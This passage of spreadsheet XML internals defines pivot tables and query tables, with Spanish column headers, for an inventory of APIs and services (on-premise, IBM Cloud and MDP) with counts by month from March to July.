    <dataField name="May" fld="19" baseField="4" baseItem="0" numFmtId="3"/>
    <dataField name="Jun" fld="20" baseField="4" baseItem="0" numFmtId="3"/>
    <dataField name="Jul" fld="21" baseField="4" baseItem="0" numFmtId="3"/>
  </dataFields>
  <chartFormats count="8">
    <chartFormat chart="0" format="284"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212" series="1">
      <pivotArea type="data" grandCol="1" outline="0" fieldPosition="0">
        <references count="1">
          <reference field="4294967294" count="1" selected="0">
            <x v="1"/>
          </reference>
        </references>
      </pivotArea>
    </chartFormat>
    <chartFormat chart="1" format="213" series="1">
      <pivotArea type="data" grandCol="1" outline="0" fieldPosition="0">
        <references count="1">
          <reference field="4294967294" count="1" selected="0">
            <x v="2"/>
          </reference>
        </references>
      </pivotArea>
    </chartFormat>
    <chartFormat chart="1" format="214" series="1">
      <pivotArea type="data" grandCol="1" outline="0" fieldPosition="0">
        <references count="1">
          <reference field="4294967294" count="1" selected="0">
            <x v="3"/>
          </reference>
        </references>
      </pivotArea>
    </chartFormat>
    <chartFormat chart="1" format="215" series="1">
      <pivotArea type="data" grandCol="1" outline="0" fieldPosition="0">
        <references count="1">
          <reference field="4294967294" count="1" selected="0">
            <x v="4"/>
          </reference>
        </references>
      </pivotArea>
    </chartFormat>
    <chartFormat chart="1" format="216" series="1">
      <pivotArea type="data" grandCol="1" outline="0" fieldPosition="0">
        <references count="1">
          <reference field="4294967294" count="1" selected="0">
            <x v="0"/>
          </reference>
        </references>
      </pivotArea>
    </chartFormat>
    <chartFormat chart="1" format="370" series="1">
      <pivotArea type="data" outline="0" fieldPosition="0">
        <references count="2">
          <reference field="4294967294" count="1" selected="0">
            <x v="0"/>
          </reference>
          <reference field="6" count="1" selected="0">
            <x v="2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D685FA-0A21-4CC8-93A7-55BAD605BF4F}" name="TablaDinámica15"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chartFormat="1">
  <location ref="B5:C8" firstHeaderRow="1" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="23">
    <pivotField axis="axisRow" compact="0" outline="0" showAll="0" defaultSubtotal="0">
      <items count="3">
        <item x="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items count="10">
        <item x="6"/>
        <item x="4"/>
        <item x="1"/>
        <item x="5"/>
        <item x="2"/>
        <item x="3"/>
        <item h="1" m="1" x="9"/>
        <item h="1" x="0"/>
        <item h="1" x="7"/>
        <item h="1" m="1" x="8"/>
      </items>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{2946ED86-A175-432a-8AC1-64E0C546D7DE}">
          <x14:pivotField fillDownLabels="1"/>
        </ext>
      </extLst>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="0"/>
  </rowFields>
  <rowItems count="3">
    <i>
      <x/>
    </i>
    <i>
      <x v="1"/>
    </i>
    <i>
      <x v="2"/>
    </i>
  </rowItems>
  <colItems count="1">
    <i/>
  </colItems>
  <dataFields count="1">
    <dataField name="APIS Y SERVICIOS" fld="4" subtotal="count" baseField="0" baseItem="1169869312"/>
  </dataFields>
  <formats count="9">
    <format dxfId="117">
      <pivotArea field="22" type="button" dataOnly="0" labelOnly="1" outline="0"/>
    </format>
    <format dxfId="116">
      <pivotArea dataOnly="0" labelOnly="1" outline="0" axis="axisValues" fieldPosition="0"/>
    </format>
    <format dxfId="115">
      <pivotArea type="all" dataOnly="0" outline="0" fieldPosition="0"/>
    </format>
    <format dxfId="114">
      <pivotArea outline="0" collapsedLevelsAreSubtotals="1" fieldPosition="0"/>
    </format>
    <format dxfId="113">
      <pivotArea field="22" type="button" dataOnly="0" labelOnly="1" outline="0"/>
    </format>
    <format dxfId="112">
      <pivotArea dataOnly="0" labelOnly="1" outline="0" axis="axisValues" fieldPosition="0"/>
    </format>
    <format dxfId="111">
      <pivotArea field="22" type="button" dataOnly="0" labelOnly="1" outline="0"/>
    </format>
    <format dxfId="110">
      <pivotArea field="22" type="button" dataOnly="0" labelOnly="1" outline="0"/>
    </format>
    <format dxfId="10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0" format="1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3" xr16:uid="{1649D481-BE85-46F2-B720-537C3941D26C}" autoFormatId="16" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="0">
  <queryTableRefresh nextId="66">
    <queryTableFields count="23">
      <queryTableField id="1" name="TIPO" tableColumnId="1"/>
      <queryTableField id="25" name="Fecha" tableColumnId="16"/>
      <queryTableField id="13" name="Nombre Producto" tableColumnId="13"/>
      <queryTableField id="14" name="Version Producto" tableColumnId="14"/>
      <queryTableField id="2" name="NOMBRE DEL SERVICIO" tableColumnId="2"/>
      <queryTableField id="3" name="VER" tableColumnId="3"/>
      <queryTableField id="22" name="Nombre Tecnico Api" tableColumnId="15"/>
      <queryTableField id="4" name="DESCRIPCION" tableColumnId="4"/>
      <queryTableField id="5" name="ÁREA - COMPONENTE MAYOR" tableColumnId="5"/>
      <queryTableField id="6" name="COMPONENTE MENOR" tableColumnId="6"/>
      <queryTableField id="35" name="EVC" tableColumnId="20"/>
      <queryTableField id="27" name="Tipo Productor" tableColumnId="12"/>
      <queryTableField id="28" name="Nombre Equipo" tableColumnId="17"/>
      <queryTableField id="29" name="Nombre Dueño de Producto" tableColumnId="18"/>
      <queryTableField id="7" name="SERVICIO PROVEEDOR" tableColumnId="7"/>
      <queryTableField id="8" name="PROVEEDOR" tableColumnId="8"/>
      <queryTableField id="9" name="CONSUMIDORES" tableColumnId="9"/>
      <queryTableField id="56" name="Marzo" tableColumnId="22"/>
      <queryTableField id="50" name="Abril" tableColumnId="11"/>
      <queryTableField id="51" name="Mayo" tableColumnId="19"/>
      <queryTableField id="52" name="Junio" tableColumnId="21"/>
      <queryTableField id="58" name="Julio" tableColumnId="23"/>
      <queryTableField id="10" name="Opcion Tipo" tableColumnId="10"/>
    </queryTableFields>
    <queryTableDeletedFields count="3">
      <deletedField name="Column5"/>
      <deletedField name="Column6"/>
      <deletedField name="Prueba"/>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2" xr16:uid="{69FD7CC5-9B49-4649-B8AE-417A72258590}" autoFormatId="16" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="0">
  <queryTableRefresh nextId="63">
    <queryTableFields count="23">
      <queryTableField id="1" name="TIPO" tableColumnId="1"/>
      <queryTableField id="23" name="Fecha" tableColumnId="15"/>
      <queryTableField id="11" name="Nombre Producto" tableColumnId="11"/>
      <queryTableField id="12" name="Version Producto" tableColumnId="12"/>
      <queryTableField id="2" name="NOMBRE DEL SERVICIO" tableColumnId="2"/>
      <queryTableField id="3" name="VER" tableColumnId="3"/>
      <queryTableField id="21" name="Nombre Tecnico Api" tableColumnId="16"/>
      <queryTableField id="4" name="DESCRIPCION" tableColumnId="4"/>
      <queryTableField id="5" name="ÁREA - COMPONENTE MAYOR" tableColumnId="5"/>
      <queryTableField id="6" name="COMPONENTE MENOR" tableColumnId="6"/>
      <queryTableField id="33" name="EVC" tableColumnId="20"/>
      <queryTableField id="25" name="Tipo Productor" tableColumnId="14"/>
      <queryTableField id="26" name="Nombre Equipo" tableColumnId="17"/>
      <queryTableField id="27" name="Nombre Dueño de Producto" tableColumnId="18"/>
      <queryTableField id="7" name="SERVICIO PROVEEDOR" tableColumnId="7"/>
      <queryTableField id="8" name="PROVEEDOR" tableColumnId="8"/>
      <queryTableField id="9" name="CONSUMIDORES" tableColumnId="9"/>
      <queryTableField id="57" name="Marzo" tableColumnId="22"/>
      <queryTableField id="51" name="Abril" tableColumnId="13"/>
      <queryTableField id="52" name="Mayo" tableColumnId="19"/>
      <queryTableField id="53" name="Junio" tableColumnId="21"/>
      <queryTableField id="60" name="Julio" tableColumnId="24"/>
      <queryTableField id="10" name="Opcion Tipo"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1" xr16:uid="{E517A3CC-D1AD-4613-B538-2EB6C5A5065B}" autoFormatId="16" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="0">
  <queryTableRefresh nextId="59">
    <queryTableFields count="23">
      <queryTableField id="1" name="TIPO" tableColumnId="1"/>
      <queryTableField id="21" name="Fecha" tableColumnId="16"/>
      <queryTableField id="11" name="Nombre Producto" tableColumnId="11"/>
      <queryTableField id="12" name="Version Producto" tableColumnId="12"/>
      <queryTableField id="2" name="NOMBRE DEL SERVICIO" tableColumnId="2"/>
      <queryTableField id="3" name="VER" tableColumnId="3"/>
      <queryTableField id="19" name="Nombre Tecnico Api" tableColumnId="15"/>
      <queryTableField id="4" name="DESCRIPCION" tableColumnId="4"/>
      <queryTableField id="5" name="ÁREA - COMPONENTE MAYOR" tableColumnId="5"/>
      <queryTableField id="6" name="COMPONENTE MENOR" tableColumnId="6"/>
      <queryTableField id="31" name="EVC" tableColumnId="20"/>
      <queryTableField id="23" name="Tipo Productor" tableColumnId="14"/>
      <queryTableField id="24" name="Nombre Equipo" tableColumnId="17"/>
      <queryTableField id="25" name="Nombre Dueño de Producto" tableColumnId="18"/>
      <queryTableField id="7" name="SERVICIO PROVEEDOR" tableColumnId="7"/>
      <queryTableField id="8" name="PROVEEDOR" tableColumnId="8"/>
      <queryTableField id="9" name="CONSUMIDORES" tableColumnId="9"/>
      <queryTableField id="47" name="Marzo" tableColumnId="22"/>
      <queryTableField id="41" name="Abril" tableColumnId="13"/>
      <queryTableField id="42" name="Mayo" tableColumnId="19"/>
      <queryTableField id="43" name="Junio" tableColumnId="21"/>
      <queryTableField id="50" name="Julio" tableColumnId="24"/>
      <queryTableField id="10" name="Opcion Tipo"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5" xr16:uid="{14C89844-9CDB-4E60-8462-3832CE95E092}" autoFormatId="16" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="0">
  <queryTableRefresh nextId="52">
    <queryTableFields count="23">
      <queryTableField id="1" name="TIPO" tableColumnId="1"/>
      <queryTableField id="21" name="Fecha" tableColumnId="16"/>
      <queryTableField id="11" name="Nombre Producto" tableColumnId="11"/>
      <queryTableField id="12" name="Version Producto" tableColumnId="12"/>
      <queryTableField id="2" name="NOMBRE DEL SERVICIO" tableColumnId="2"/>
      <queryTableField id="3" name="VER" tableColumnId="3"/>
      <queryTableField id="19" name="Nombre Tecnico Api" tableColumnId="15"/>
      <queryTableField id="4" name="DESCRIPCION" tableColumnId="4"/>
      <queryTableField id="5" name="ÁREA - COMPONENTE MAYOR" tableColumnId="5"/>
      <queryTableField id="6" name="COMPONENTE MENOR" tableColumnId="6"/>
      <queryTableField id="32" name="EVC" tableColumnId="20"/>
      <queryTableField id="24" name="Tipo Productor" tableColumnId="14"/>
      <queryTableField id="25" name="Nombre Equipo" tableColumnId="17"/>
      <queryTableField id="26" name="Nombre Dueño de Producto" tableColumnId="18"/>
      <queryTableField id="7" name="SERVICIO PROVEEDOR" tableColumnId="7"/>
      <queryTableField id="8" name="PROVEEDOR" tableColumnId="8"/>
      <queryTableField id="9" name="CONSUMIDORES" tableColumnId="9"/>
      <queryTableField id="48" name="Marzo" tableColumnId="22"/>
      <queryTableField id="42" name="Abril" tableColumnId="13"/>
      <queryTableField id="43" name="Mayo" tableColumnId="19"/>
      <queryTableField id="44" name="Junio" tableColumnId="21"/>
      <queryTableField id="50" name="Julio" tableColumnId="23"/>
      <queryTableField id="10" name="Opcion Tipo" tableColumnId="1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4" xr16:uid="{3D7C0A4F-AE55-4C8D-B23D-0B26D5EB35D5}" autoFormatId="16" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="0">
  <queryTableRefresh nextId="52">
    <queryTableFields count="23">
      <queryTableField id="1" name="TIPO" tableColumnId="1"/>
      <queryTableField id="22" name="Fecha" tableColumnId="16"/>
      <queryTableField id="11" name="Nombre Producto" tableColumnId="11"/>
      <queryTableField id="12" name="Version Producto" tableColumnId="12"/>
      <queryTableField id="2" name="NOMBRE DEL SERVICIO" tableColumnId="2"/>
      <queryTableField id="3" name="VER" tableColumnId="3"/>
      <queryTableField id="20" name="Nombre Tecnico Api" tableColumnId="15"/>
      <queryTableField id="4" name="DESCRIPCION" tableColumnId="4"/>
      <queryTableField id="5" name="ÁREA - COMPONENTE MAYOR" tableColumnId="5"/>
      <queryTableField id="6" name="COMPONENTE MENOR" tableColumnId="6"/>
      <queryTableField id="32" name="EVC" tableColumnId="20"/>
      <queryTableField id="24" name="Tipo Productor" tableColumnId="14"/>
      <queryTableField id="25" name="Nombre Equipo" tableColumnId="17"/>
      <queryTableField id="26" name="Nombre Dueño de Producto" tableColumnId="18"/>
      <queryTableField id="7" name="SERVICIO PROVEEDOR" tableColumnId="7"/>
      <queryTableField id="8" name="PROVEEDOR" tableColumnId="8"/>
      <queryTableField id="9" name="CONSUMIDORES" tableColumnId="9"/>
      <queryTableField id="48" name="Marzo" tableColumnId="22"/>
      <queryTableField id="42" name="Abril" tableColumnId="13"/>
      <queryTableField id="43" name="Mayo" tableColumnId="19"/>
      <queryTableField id="44" name="Junio" tableColumnId="21"/>
      <queryTableField id="50" name="Julio" tableColumnId="23"/>
      <queryTableField id="10" name="Opcion Tipo"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A86C6C0-3BA4-42F5-A3B1-4966EC0D247E}" name="Consolidado" displayName="Consolidado" ref="A1:W1130" tableType="queryTable" totalsRowShown="0" headerRowDxfId="94">
  <tableColumns count="23">
    <tableColumn id="1" xr3:uid="{1627F622-A3FD-45DC-B254-EA8C684E6BC4}" uniqueName="1" name="TIPO" queryTableFieldId="1" dataDxfId="93"/>
    <tableColumn id="16" xr3:uid="{80E365B5-9403-43CD-BC7A-8E5CC22CB434}" uniqueName="16" name="Fecha" queryTableFieldId="25" dataDxfId="92"/>
    <tableColumn id="13" xr3:uid="{4214A30C-0D43-4B4E-83D5-3484881977A7}" uniqueName="13" name="Nombre Producto" queryTableFieldId="13" dataDxfId="91"/>
    <tableColumn id="14" xr3:uid="{70F80E2C-6848-4DE3-8E6F-E4366621DBE4}" uniqueName="14" name="Version Producto" queryTableFieldId="14" dataDxfId="90"/>
    <tableColumn id="2" xr3:uid="{583B2952-7B4A-4830-976C-233C88559E0E}" uniqueName="2" name="NOMBRE DEL SERVICIO" queryTableFieldId="2" dataDxfId="89"/>
    <tableColumn id="3" xr3:uid="{9BD4945F-5FD6-437E-83BD-7CDF37ACB5EB}" uniqueName="3" name="VER" queryTableFieldId="3" dataDxfId="88"/>
    <tableColumn id="15" xr3:uid="{A2281627-6F6D-4E26-8A48-20DA2FFBF3BF}" uniqueName="15" name="Nombre Tecnico Api" queryTableFieldId="22" dataDxfId="87"/>
    <tableColumn id="4" xr3:uid="{C6AB7FBA-82CA-4843-8DBB-3A371DF0C34F}" uniqueName="4" name="DESCRIPCION" queryTableFieldId="4" dataDxfId="86"/>
    <tableColumn id="5" xr3:uid="{ACBEB9C7-0207-47E6-B90E-57F56A0F4069}" uniqueName="5" name="ÁREA - COMPONENTE MAYOR" queryTableFieldId="5" dataDxfId="85"/>
    <tableColumn id="6" xr3:uid="{9097C5B7-C5D0-4413-935E-B985BD19B0CA}" uniqueName="6" name="COMPONENTE MENOR" queryTableFieldId="6" dataDxfId="84"/>
    <tableColumn id="20" xr3:uid="{E34171AE-73F5-42E4-9797-0C631C91C62A}" uniqueName="20" name="EVC" queryTableFieldId="35" dataDxfId="83"/>
    <tableColumn id="12" xr3:uid="{479B8F9B-716C-4A10-8D9F-C40805C207F6}" uniqueName="12" name="Tipo Productor" queryTableFieldId="27"/>
    <tableColumn id="17" xr3:uid="{1C0AF89A-D132-41B2-8CEC-E8F31B01FEEB}" uniqueName="17" name="Nombre Equipo" queryTableFieldId="28" dataDxfId="82"/>
    <tableColumn id="18" xr3:uid="{FE607A5F-EF24-408A-ABCC-720BBCB4B605}" uniqueName="18" name="Nombre Dueño de Producto" queryTableFieldId="29"/>
    <tableColumn id="7" xr3:uid="{DD5A27F6-5271-4436-82D3-0DD3DFF676DF}" uniqueName="7" name="SERVICIO PROVEEDOR" queryTableFieldId="7" dataDxfId="81"/>
    <tableColumn id="8" xr3:uid="{D21460E4-9D80-48ED-981A-4F82D1D6751B}" uniqueName="8" name="PROVEEDOR" queryTableFieldId="8" dataDxfId="80"/>
    <tableColumn id="9" xr3:uid="{EE847336-14F3-4D68-B1A7-77C6868BD282}" uniqueName="9" name="CONSUMIDORES" queryTableFieldId="9" dataDxfId="79"/>
    <tableColumn id="22" xr3:uid="{1262C957-1907-45D5-A34A-9693BA2C32A2}" uniqueName="22" name="Marzo" queryTableFieldId="56"/>
    <tableColumn id="11" xr3:uid="{641E938C-6B62-4B76-AB90-BD6E32D2073B}" uniqueName="11" name="Abril" queryTableFieldId="50"/>
    <tableColumn id="19" xr3:uid="{A5E422BD-B682-4186-BF83-F6E1A5600A0E}" uniqueName="19" name="Mayo" queryTableFieldId="51"/>
    <tableColumn id="21" xr3:uid="{AE1E6A69-1ABE-4EE5-8C52-178711F48C69}" uniqueName="21" name="Junio" queryTableFieldId="52"/>
    <tableColumn id="23" xr3:uid="{40B9BDDF-A473-4905-86DC-D3AFBBBA50DF}" uniqueName="23" name="Julio" queryTableFieldId="58"/>
    <tableColumn id="10" xr3:uid="{6EBDAB5B-7B67-4585-8F3D-F6505A598CFC}" uniqueName="10" name="Opcion Tipo" queryTableFieldId="10" dataDxfId="7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3036AA6-73B2-4C12-8C6E-526E110DD275}" name="API_ONPREMISE" displayName="API_ONPREMISE" ref="A1:W386" tableType="queryTable" totalsRowShown="0">
  <autoFilter ref="A1:W386" xr:uid="{0E28EDE6-F300-4136-9A45-C9B3577ECF46}"/>
  <tableColumns count="23">
    <tableColumn id="1" xr3:uid="{1A093C4E-CCA3-4334-8FC3-40F7C4EE03DF}" uniqueName="1" name="TIPO" queryTableFieldId="1" dataDxfId="77"/>
    <tableColumn id="15" xr3:uid="{3A772103-9A43-4390-A83F-069B07D76C5C}" uniqueName="15" name="Fecha" queryTableFieldId="23"/>
    <tableColumn id="11" xr3:uid="{3CDCE5EC-3EB0-4714-A329-63F777E137F4}" uniqueName="11" name="Nombre Producto" queryTableFieldId="11"/>
    <tableColumn id="12" xr3:uid="{19C9AB3F-5187-4235-AFE2-2BCAD90D14AE}" uniqueName="12" name="Version Producto" queryTableFieldId="12"/>
    <tableColumn id="2" xr3:uid="{6C1D7CB1-2A07-4C9F-98C0-D75850B0956C}" uniqueName="2" name="NOMBRE DEL SERVICIO" queryTableFieldId="2" dataDxfId="76"/>
    <tableColumn id="3" xr3:uid="{CEA6BCC4-D567-4E79-B30B-F457FF3D6096}" uniqueName="3" name="VER" queryTableFieldId="3"/>
    <tableColumn id="16" xr3:uid="{DE3676E3-CAE3-4B25-A2FD-13BEBBA44544}" uniqueName="16" name="Nombre Tecnico Api" queryTableFieldId="21"/>
    <tableColumn id="4" xr3:uid="{A7647B56-3C46-4CBC-84E3-7AC2E085F3E5}" uniqueName="4" name="DESCRIPCION" queryTableFieldId="4" dataDxfId="75"/>
    <tableColumn id="5" xr3:uid="{AB1D3FDF-40F9-41A2-AF5A-8AF5505195EF}" uniqueName="5" name="ÁREA - COMPONENTE MAYOR" queryTableFieldId="5" dataDxfId="74"/>
    <tableColumn id="6" xr3:uid="{65DEC6AE-B625-4278-98E3-6AAC6CBD6569}" uniqueName="6" name="COMPONENTE MENOR" queryTableFieldId="6" dataDxfId="73"/>
    <tableColumn id="20" xr3:uid="{4037AA95-2F79-4818-BF93-C34CA0837D8B}" uniqueName="20" name="EVC" queryTableFieldId="33"/>
    <tableColumn id="14" xr3:uid="{96E57FBC-2CEA-4A62-A1E6-3E3CE0CE5D60}" uniqueName="14" name="Tipo Productor" queryTableFieldId="25"/>
    <tableColumn id="17" xr3:uid="{2102E13C-EEEE-4F29-A699-B4118DA27374}" uniqueName="17" name="Nombre Equipo" queryTableFieldId="26"/>
    <tableColumn id="18" xr3:uid="{8DC1115B-9E4B-42AC-8243-D45415C5DC67}" uniqueName="18" name="Nombre Dueño de Producto" queryTableFieldId="27"/>
    <tableColumn id="7" xr3:uid="{A650CEED-F4FD-4F02-9249-DEA5815902A4}" uniqueName="7" name="SERVICIO PROVEEDOR" queryTableFieldId="7" dataDxfId="72"/>
    <tableColumn id="8" xr3:uid="{EC90294F-B408-4D08-A185-6DBDDD6EB1D8}" uniqueName="8" name="PROVEEDOR" queryTableFieldId="8" dataDxfId="71"/>
    <tableColumn id="9" xr3:uid="{8BB17434-835F-4D0E-B151-2FEDAA29B6E8}" uniqueName="9" name="CONSUMIDORES" queryTableFieldId="9" dataDxfId="70"/>
    <tableColumn id="22" xr3:uid="{50888E5D-4420-4705-9E67-03C7FCAE2CF4}" uniqueName="22" name="Marzo" queryTableFieldId="57"/>
    <tableColumn id="13" xr3:uid="{3F4DE14B-95B3-4410-8DC9-C228106F4CB7}" uniqueName="13" name="Abril" queryTableFieldId="51"/>
    <tableColumn id="19" xr3:uid="{D8E4948C-BF9E-4544-81C8-4743CF6B55CD}" uniqueName="19" name="Mayo" queryTableFieldId="52"/>
    <tableColumn id="21" xr3:uid="{A2F40C80-46CD-4F5F-8C13-D352C77BEF63}" uniqueName="21" name="Junio" queryTableFieldId="53"/>
    <tableColumn id="24" xr3:uid="{F211F6DF-E566-4BC4-BDB6-3F204EC8069A}" uniqueName="24" name="Julio" queryTableFieldId="60"/>
    <tableColumn id="10" xr3:uid="{9FD392F0-9F86-4F19-9931-091E34C50236}" uniqueName="10" name="Opcion Tipo" queryTableFieldId="10" dataDxfId="6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D2CA201-76CB-4077-9408-5B1554910817}" name="API_IBM_Cloud" displayName="API_IBM_Cloud" ref="A1:W204" tableType="queryTable" totalsRowShown="0">
  <autoFilter ref="A1:W204" xr:uid="{DE44B373-CAEB-4642-AAB7-DA21393A68EC}"/>
  <tableColumns count="23">
    <tableColumn id="1" xr3:uid="{128F8B2E-6000-4D30-93DA-F8B8F2CACFF9}" uniqueName="1" name="TIPO" queryTableFieldId="1" dataDxfId="68"/>
    <tableColumn id="16" xr3:uid="{211E54EA-FB5B-4FDC-87CB-20272E8DF49F}" uniqueName="16" name="Fecha" queryTableFieldId="21"/>
    <tableColumn id="11" xr3:uid="{CD88CC99-8DDA-43FF-B9FE-0C416A7E751A}" uniqueName="11" name="Nombre Producto" queryTableFieldId="11"/>
    <tableColumn id="12" xr3:uid="{027860D5-1333-4F11-8405-39C864221924}" uniqueName="12" name="Version Producto" queryTableFieldId="12"/>
    <tableColumn id="2" xr3:uid="{47312F5F-572D-4D95-BBC9-34A826A4FFC0}" uniqueName="2" name="NOMBRE DEL SERVICIO" queryTableFieldId="2" dataDxfId="67"/>
    <tableColumn id="3" xr3:uid="{DC3A9B97-ECC4-49A6-B0A5-BE52A485532C}" uniqueName="3" name="VER" queryTableFieldId="3"/>
    <tableColumn id="15" xr3:uid="{7010B723-1109-48E9-AD75-18DE5A944FF2}" uniqueName="15" name="Nombre Tecnico Api" queryTableFieldId="19"/>
    <tableColumn id="4" xr3:uid="{DFA669FA-9E16-4457-94E7-6EB703F5F3C6}" uniqueName="4" name="DESCRIPCION" queryTableFieldId="4" dataDxfId="66"/>
    <tableColumn id="5" xr3:uid="{3397D6C7-ECC0-4EAA-A715-5540483A049B}" uniqueName="5" name="ÁREA - COMPONENTE MAYOR" queryTableFieldId="5" dataDxfId="65"/>
    <tableColumn id="6" xr3:uid="{3B46BABE-5FF0-4CFC-BF7E-992AFE9B7DBB}" uniqueName="6" name="COMPONENTE MENOR" queryTableFieldId="6" dataDxfId="64"/>
    <tableColumn id="20" xr3:uid="{D14D6379-20E4-4F42-9D55-2DE6986A73B6}" uniqueName="20" name="EVC" queryTableFieldId="31"/>
    <tableColumn id="14" xr3:uid="{A8B2C2CD-932A-4EB4-8FD3-E57BEF9CA744}" uniqueName="14" name="Tipo Productor" queryTableFieldId="23"/>
    <tableColumn id="17" xr3:uid="{360E2BFE-F42F-46FA-A28A-435AE54CFA56}" uniqueName="17" name="Nombre Equipo" queryTableFieldId="24"/>
    <tableColumn id="18" xr3:uid="{8CB8376F-8658-4380-82AB-80BF9DE61B28}" uniqueName="18" name="Nombre Dueño de Producto" queryTableFieldId="25"/>
    <tableColumn id="7" xr3:uid="{8F9D90A4-A4E9-4FD6-89D9-E74E650C0308}" uniqueName="7" name="SERVICIO PROVEEDOR" queryTableFieldId="7" dataDxfId="63"/>
    <tableColumn id="8" xr3:uid="{2A6219FA-D7CE-41D2-A5FF-53F77D4F0DDD}" uniqueName="8" name="PROVEEDOR" queryTableFieldId="8" dataDxfId="62"/>
    <tableColumn id="9" xr3:uid="{D5D14454-0706-473D-ACCF-8B2331B4BEBE}" uniqueName="9" name="CONSUMIDORES" queryTableFieldId="9" dataDxfId="61"/>
    <tableColumn id="22" xr3:uid="{BDC7194A-DAA5-4427-B0EA-D6F552E618B8}" uniqueName="22" name="Marzo" queryTableFieldId="47"/>
    <tableColumn id="13" xr3:uid="{BFF1DE87-FB49-4610-9BCC-BC800C1152C8}" uniqueName="13" name="Abril" queryTableFieldId="41"/>
    <tableColumn id="19" xr3:uid="{9722B045-8206-4EED-BCB2-4C9362A76D57}" uniqueName="19" name="Mayo" queryTableFieldId="42"/>
    <tableColumn id="21" xr3:uid="{CE3A74EE-14F5-4796-9103-44E176199465}" uniqueName="21" name="Junio" queryTableFieldId="43"/>
    <tableColumn id="24" xr3:uid="{1E6BBD28-76F2-4BA3-8891-761DD8418745}" uniqueName="24" name="Julio" queryTableFieldId="50"/>
    <tableColumn id="10" xr3:uid="{A6878030-3581-4E8D-8D3E-D4BD3FCA80E0}" uniqueName="10" name="Opcion Tipo" queryTableFieldId="10"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6BE0492-DA41-4A0B-88F4-A0BC1F011653}" name="Servicios_MDP" displayName="Servicios_MDP" ref="A1:W102" tableType="queryTable" totalsRowShown="0">
  <autoFilter ref="A1:W102" xr:uid="{B4D6353C-9850-4EAF-A9FF-0FBD5CF2F81F}"/>
  <tableColumns count="23">
    <tableColumn id="1" xr3:uid="{8C8C8F95-F3BA-4A36-8848-D9B90EC35C25}" uniqueName="1" name="TIPO" queryTableFieldId="1" dataDxfId="59"/>
    <tableColumn id="16" xr3:uid="{FF0FE814-C496-45C0-8E54-60AFD01969E0}" uniqueName="16" name="Fecha" queryTableFieldId="21"/>
    <tableColumn id="11" xr3:uid="{8BA9D3C0-D614-4D25-AC23-710F2AC02C5C}" uniqueName="11" name="Nombre Producto" queryTableFieldId="11"/>
    <tableColumn id="12" xr3:uid="{8E00BFDF-700E-4F75-8FA4-CFFB23A72C25}" uniqueName="12" name="Version Producto" queryTableFieldId="12"/>
    <tableColumn id="2" xr3:uid="{911B383D-03F9-4C1D-8188-ED8062E212FA}" uniqueName="2" name="NOMBRE DEL SERVICIO" queryTableFieldId="2" dataDxfId="58"/>
    <tableColumn id="3" xr3:uid="{ABB03723-DB25-4FF9-98FF-664A4CEA3C35}" uniqueName="3" name="VER" queryTableFieldId="3"/>
    <tableColumn id="15" xr3:uid="{09BB79BE-A037-40E8-999D-A682BE7819AF}" uniqueName="15" name="Nombre Tecnico Api" queryTableFieldId="19"/>
    <tableColumn id="4" xr3:uid="{E97FAB70-AD51-4442-85F7-41D0EB15F635}" uniqueName="4" name="DESCRIPCION" queryTableFieldId="4" dataDxfId="57"/>
    <tableColumn id="5" xr3:uid="{D0669453-0079-4FBE-A2E6-02FD9E19C731}" uniqueName="5" name="ÁREA - COMPONENTE MAYOR" queryTableFieldId="5" dataDxfId="56"/>
    <tableColumn id="6" xr3:uid="{F6179BDD-849C-4F8A-81B7-F313CAA92B6F}" uniqueName="6" name="COMPONENTE MENOR" queryTableFieldId="6" dataDxfId="55"/>
    <tableColumn id="20" xr3:uid="{6765B80B-94E7-4889-9161-D272B5508E89}" uniqueName="20" name="EVC" queryTableFieldId="32"/>
    <tableColumn id="14" xr3:uid="{E27B7245-DB0B-412C-8FFE-4023CFC5268D}" uniqueName="14" name="Tipo Productor" queryTableFieldId="24"/>
    <tableColumn id="17" xr3:uid="{6AF85D9E-4354-44F7-B71F-F13BF360FFCF}" uniqueName="17" name="Nombre Equipo" queryTableFieldId="25"/>
    <tableColumn id="18" xr3:uid="{C5981167-71E8-4AF4-ABF7-7A860FBEB2A6}" uniqueName="18" name="Nombre Dueño de Producto" queryTableFieldId="26"/>
    <tableColumn id="7" xr3:uid="{D7A5B7EE-276C-4CF6-A6AA-18B2039437B9}" uniqueName="7" name="SERVICIO PROVEEDOR" queryTableFieldId="7"/>
    <tableColumn id="8" xr3:uid="{33F19AE8-916D-481D-97E7-C708DA69A13E}" uniqueName="8" name="PROVEEDOR" queryTableFieldId="8" dataDxfId="54"/>
    <tableColumn id="9" xr3:uid="{5D0486FB-D8D0-4300-886F-27CF8DF59253}" uniqueName="9" name="CONSUMIDORES" queryTableFieldId="9" dataDxfId="53"/>
    <tableColumn id="22" xr3:uid="{B9962584-91B3-4C87-B5FF-FB8A05014F1F}" uniqueName="22" name="Marzo" queryTableFieldId="48"/>
    <tableColumn id="13" xr3:uid="{97066194-47B2-45ED-B645-5294548358E1}" uniqueName="13" name="Abril" queryTableFieldId="42"/>
    <tableColumn id="19" xr3:uid="{1F5CD5BD-4AAB-4C96-93E3-7C79F24BC495}" uniqueName="19" name="Mayo" queryTableFieldId="43"/>
    <tableColumn id="21" xr3:uid="{264CF7F8-3F67-40AC-A527-2AA5F7EE0B65}" uniqueName="21" name="Junio" queryTableFieldId="44"/>
    <tableColumn id="23" xr3:uid="{103FC1E9-55EE-46F1-B0EE-2B33BDA8E549}" uniqueName="23" name="Julio" queryTableFieldId="50"/>
